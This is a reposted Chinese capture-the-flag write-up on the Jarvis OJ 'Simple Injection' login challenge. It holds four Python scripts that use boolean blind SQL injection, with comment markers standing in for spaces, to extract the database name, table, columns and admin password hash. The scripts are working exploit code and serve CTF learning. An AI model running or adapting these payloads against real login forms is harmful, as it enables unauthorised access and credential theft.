ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Jarvis OJ Simple Injection

2019-05-10 20:54:14  阅读:367  来源: 互联网

标签:web name Simple mid result print Injection password Jarvis


Jarvis OJ Simple Injection

题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,胡乱输入其他的是用户名错误,让后 1‘ or ‘1可以,但是1’ or 1#却不行,1‘/**/or/**/1#也可以。所以应该是过滤了空格,其他的都没过滤。

让后就想到了实验吧的一道题,
附上题目连接:http://ctf5.shiyanbar.com/web/pcat/index.php 和我写的题解
“因缺思汀的绕过”
试了一下,发现不行。于是开始盲注。
附上脚本:
爆数据库

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr(database(),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if(mid==1):
        break
    result+=chr(mid)
    print(result)
print("database:",result)
#database: injection

爆表名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result,mid)
print("table_name:",result)
#table_name: admin

字段名

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("column_name:",result)
#column_name: id,username,password

password

import requests
url="http://web.jarvisoj.com:32787/login.php"
payload={
    "username" : "",
    "password" : 1
}
urls="'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))>{1}#"
result=""
for i in range(1,100):
    l=1
    r=130
    mid=(l+r)>>1
    while(l<r):
        payload["username"]=urls.format(i,mid)
        a=requests.post(url,data=payload)
        if "密码错误" in a.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if (mid == 1):
        break
    result+=chr(mid)
    print(result)
print("password:",result)
#password: 334cfb59c9d74849801d5acdcfdaadc3

标签:web,name,Simple,mid,result,print,Injection,password,Jarvis
来源: https://blog.csdn.net/weixin_44077544/article/details/90082789

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有